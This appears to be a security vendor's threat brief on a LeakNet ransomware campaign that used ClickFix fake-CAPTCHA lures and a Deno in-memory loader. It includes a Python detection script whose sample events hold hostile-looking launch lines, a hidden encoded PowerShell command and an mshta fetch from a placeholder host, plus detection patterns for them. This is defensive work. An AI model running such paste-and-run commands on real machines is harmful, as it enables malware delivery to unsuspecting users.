Executive Summary
In March 2026, the LeakNet ransomware group initiated a sophisticated campaign leveraging the ClickFix social engineering technique to gain initial access to target systems. By compromising legitimate websites, they presented users with deceptive prompts instructing them to execute malicious PowerShell commands under the guise of resolving non-existent errors. This method effectively bypassed traditional security measures, leading to the deployment of an in-memory loader utilizing the Deno JavaScript runtime. This loader facilitated the execution of the CastleRAT malware directly in memory, thereby evading detection by conventional endpoint security solutions. The campaign resulted in significant data breaches and operational disruptions across multiple sectors.
This incident underscores a concerning evolution in ransomware tactics, highlighting the increasing sophistication of social engineering methods and the exploitation of novel technologies like the Deno runtime for stealthy malware deployment. The use of in-memory execution techniques poses a substantial challenge to traditional security defenses, emphasizing the need for advanced detection mechanisms and comprehensive user education to mitigate such threats.
Why This Matters Now
The LeakNet ransomware campaign exemplifies the growing trend of threat actors employing advanced social engineering tactics and in-memory execution methods to evade detection. The exploitation of the Deno runtime for malware deployment represents a novel approach that traditional security tools may not effectively detect. This incident highlights the urgent need for organizations to enhance their security posture by adopting advanced behavioral detection systems and conducting regular user training to recognize and resist sophisticated phishing and social engineering attacks.
Attack Path Analysis
The LeakNet ransomware group initiated their attack by employing the ClickFix social engineering technique, tricking users into executing malicious commands via compromised websites. After gaining initial access, they escalated privileges and then moved laterally across the network to identify and reach critical assets. They established command and control to maintain persistent communication with compromised systems, exfiltrated sensitive data, and finally deployed ransomware to encrypt files, culminating in significant operational disruption.
Kill Chain Progression
Initial Compromise
Description
LeakNet utilized the ClickFix technique, presenting fake CAPTCHA verifications on compromised websites to deceive users into executing malicious commands.
MITRE ATT&CK® Techniques
User Execution: Malicious Copy and Paste
Command and Scripting Interpreter: PowerShell
System Binary Proxy Execution: Mshta
Obfuscated Files or Information
Application Layer Protocol: DNS
Virtualization/Sandbox Evasion: System Checks
Obfuscated Files or Information: Steganography
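The ClickFix lure described above ends with the user pasting a one-liner into the Run box or Explorer address bar, so the resulting PowerShell or mshta process is a child of explorer.exe. The following detection logic, an added example that is not part of the original brief, runs over constructed process-creation events (parent image, child image, command line) and flags that launch path only when it is combined with command-line indicators such as an encoded command, a hidden window, or a remote URL; the sample events, the indicator list and the alert threshold are assumptions for illustration.

```python
import re

# Constructed sample process-creation events (parent image, child image, command line).
# These are made-up records for illustration, not telemetry from the incident in this brief.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -nop -ep bypass -enc QQBCAEMA"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     "mshta.exe http://example.invalid/verify.hta"),
    (r"C:\Program Files\Git\git-bash.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\build.ps1"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

# ClickFix asks the user to paste into the Run box or Explorer address bar, so the
# script host is spawned by explorer.exe rather than by a scheduler, IDE or shell.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Command-line indicators that commonly accompany pasted one-liners (assumed list).
SUSPICIOUS_ARGS = {
    "encoded command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)(?:\s|$)", re.I),
    "hidden window": re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote URL": re.compile(r"https?://", re.I),
}

def image_name(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(parent: str, child: str, cmdline: str) -> list:
    """Return the reasons an event looks like a ClickFix paste-and-run launch.

    Alerts only when the launch path (explorer.exe -> script host) AND at least one
    command-line indicator match, which keeps ordinary admin PowerShell use quiet.
    """
    if not (image_name(parent) in RUN_DIALOG_PARENTS and image_name(child) in SCRIPT_HOSTS):
        return []
    hits = [label for label, pat in SUSPICIOUS_ARGS.items() if pat.search(cmdline)]
    return ["explorer.exe spawned " + image_name(child)] + hits if hits else []

def detect_clickfix(events) -> list:
    """Run score_event over (parent, child, cmdline) tuples; return (index, reasons) alerts."""
    return [(i, r) for i, (p, c, cl) in enumerate(events) if (r := score_event(p, c, cl))]

if __name__ == "__main__":
    for idx, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
```

On the sample set only the two explorer.exe-launched script hosts alert; the developer's PowerShell build script and the Notepad launch stay quiet.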
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Training and Monitoring
Control ID: 500.14(b)
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA Zero Trust Maturity Model 2.0 – Implement user training to recognize and resist social engineering attacks
Control ID: Identity Pillar: User Training
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Banking/Mortgage
LeakNet ransomware via ClickFix poses critical risks to financial institutions through compromised websites, threatening encrypted traffic, egress security, and regulatory compliance requirements.
Health Care / Life Sciences
Healthcare organizations face severe HIPAA compliance violations from LeakNet's social engineering tactics, potentially compromising patient data through lateral movement and exfiltration capabilities.
Information Technology/IT
The IT sector is highly vulnerable to LeakNet's Deno in-memory loader and ClickFix methods, requiring enhanced zero trust segmentation and multicloud visibility controls.
Government Administration
Government entities are at risk from LeakNet's sophisticated attack vectors targeting public websites, necessitating strengthened threat detection and anomaly response systems.
Sources
- LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader: https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html
- ClickFix Attacks Surge 517% in 2025: https://www.infosecurity-magazine.com/news/clickfix-attacks-surge-2025/
- Think before you Click(Fix): Analyzing the ClickFix social engineering technique: https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident because it could limit the attacker's ability to move laterally, escalate privileges, and exfiltrate data by enforcing strict segmentation and identity-aware policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: While Aviatrix CNSF primarily focuses on internal network security, its comprehensive visibility and monitoring capabilities could detect anomalous traffic patterns associated with the initial compromise.
Control: Zero Trust Segmentation
Mitigation: Aviatrix Zero Trust Segmentation would likely limit the attacker's ability to escalate privileges by enforcing strict access controls and segmenting network resources based on identity and context.
Control: East-West Traffic Security
Mitigation: Aviatrix East-West Traffic Security would likely restrict lateral movement by monitoring and controlling internal traffic flows, thereby limiting unauthorized access to critical assets.
Control: Multicloud Visibility & Control
Mitigation: Aviatrix Multicloud Visibility & Control would likely detect and disrupt unauthorized command and control communications by providing comprehensive monitoring across multicloud environments.
Control: Egress Security & Policy Enforcement
Mitigation: Aviatrix Egress Security & Policy Enforcement would likely prevent data exfiltration by enforcing strict egress policies and monitoring outbound traffic for anomalies.
While Aviatrix CNSF focuses on network security, its segmentation and access controls could limit the spread of ransomware, thereby reducing the overall impact on the organization.
Impact at a Glance
Affected Business Functions
- Data Management
- Customer Service
- Financial Transactions
Estimated downtime: 14 days
Estimated loss: $500,000
Potential exposure of sensitive customer data and financial records.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement and limit attackers' ability to access critical assets.
- Enhance East-West Traffic Security to monitor and control internal network communications, detecting unauthorized movements.
- Deploy Egress Security & Policy Enforcement to prevent unauthorized data exfiltration and block communication with malicious external servers.
- Utilize Threat Detection & Anomaly Response systems to identify and respond to unusual activities indicative of compromise.
- Educate users on social engineering tactics like ClickFix to reduce the risk of initial compromise through deceptive prompts.